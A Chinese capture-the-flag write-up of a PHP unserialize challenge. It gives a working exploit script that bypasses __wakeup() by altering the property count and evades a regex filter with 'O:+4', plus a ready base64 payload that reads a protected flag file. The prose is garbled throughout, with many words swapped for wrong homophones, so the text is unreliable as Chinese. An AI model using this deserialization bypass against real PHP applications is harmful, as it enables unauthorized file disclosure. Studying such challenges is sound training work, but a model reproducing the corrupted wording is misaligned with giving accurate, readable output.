共计 1515 个字符,预计需要花费 4 分钟才能阅读完成。
这篇文章次要介绍了 php 的平安防护,对于攻防世界 Web php unserialize 正则表达式反序列化示例详解,有须要的敌人能够借鉴参考下,心愿可能有所帮忙
步骤
首先关上题目,发现给了一段源码:
剖析源码,发现类外面有三个魔术办法:
__construct():构造函数,对类的变量进行初始化,创立时主动调用,用失去的参数笼罩 $file
__destruct():销毁时调用,会显示文件的代码,这里要显示 fl4g.php
__wakeup():在进行反序列化之前会调用,会把 $file 重置成 index.php
正则表达式的含意:o 或 c 结尾,冒号,一个或多个数字,不辨别大小写
ok,剖析结束:咱们要将序列化后的字符串进行 base64 加密之后进行 get 传参到 var 变量即可
然而这里咱们能够看出须要绕过__wakeup()函数以及正则匹配,才可能拿到 flag
__wakeup()办法绕过办法:当成员属性的数目大于理论数目的时候即可绕过此办法
正则匹配咱们能够应用 + 来进行绕过
代码:
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {$this->file = $file;}
function __destruct() {echo @highlight_file($this->file, true);
}
function __wakeup() {if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a = new Demo("fl4g.php");// 传入咱们须要显示的文件
$b = serialize($a);// 进行序列化
echo $b;// O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
$b = str_replace("O:4", "O:+4", $b);// 绕过正则匹配
$b = str_replace("1:{","2:{",$b);// 绕过__wakeup()办法
echo base64_encode($b);// 进行 base64 编码并输入
?>
payload:var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
胜利拿到 flag~
留神:这里有个坑,要是间接将序列化之后的字符串进行手动批改再去找在线网站进行加密则会发现编码之后和咱们 payload 里的不太一样
这是因为 file 变量为公有变量,所以序列化之后的字符串结尾和结尾各有一个空白字符,而咱们在对序列化之后的字符串进行输入时,浏览器则不显示空字符,如图:
仔细的敌人也会发现 Demofile 只有 8 个字符,而长度却显示 10。
所以正确的序列化字符串应该是
O:4:”Demo”:1:{s:10:” Demo file”;s:8:”fl4g.php”;}
而咱们因为是应用 php 代码间接进行编码的,全自动化,天然不会漏掉空字符。
解释一下 php 序列化字符串的格局:
首先对象类型分为以下几种
a – array b – boolean
d – double i – integer
o – common object r – reference
s – string C – custom object
O – class N – null
R – pointer reference U – unicode string
格局:对象类型: 长度:” 类名 ”: 类中变量的个数:{类型: 长度:” 值 ”; 类型: 长度:” 值 ”;……}
总结
考查对 php 中魔术办法的相熟水平,以及反序列化的利用
